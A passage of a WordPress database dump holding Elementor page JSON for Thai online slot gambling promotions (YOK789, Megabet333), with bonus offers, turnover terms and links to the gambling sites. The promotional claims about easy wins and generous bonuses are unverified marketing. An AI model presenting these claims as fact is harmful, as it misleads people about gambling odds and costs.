\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 YOK789 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG.webp\",\"id\":287,\"size\":\"\",\"alt\":\"PG\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming.webp\",\"id\":286,\"size\":\"\",\"alt\":\"Microgaming\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI.webp\",\"id\":291,\"size\":\"\",\"alt\":\"JILI\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo.webp\",\"id\":285,\"size\":\"\",\"alt\":\"Slot xo\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic.webp\",\"id\":284,\"size\":\"\",\"alt\":\"pragmatic\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2145,306,'_thumbnail_id','280'),(2152,282,'_wp_attachment_image_alt','79 get 200'),(2166,281,'_wp_attachment_image_alt','20 get 100'),(2167,279,'_wp_attachment_image_alt','Bonus free 100'),(2168,275,'_wp_attachment_image_alt','HBD Bonus'),(2169,277,'_wp_attachment_image_alt','Reward 10'),(2170,276,'_wp_attachment_image_alt','lucky wheel'),(2171,308,'_elementor_edit_mode','builder'),(2172,308,'_elementor_template_type','wp-page'),(2173,308,'_elementor_version','3.32.5'),(2174,308,'_elementor_pro_version','3.32.3'),(2175,308,'_wp_page_template','default'),(2176,308,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2177,308,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/20_get_100_-_Megabet333-Biz.webp\",\"id\":161,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_get_200_7turn_-_Megabet333-Biz.webp\",\"id\":157,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ 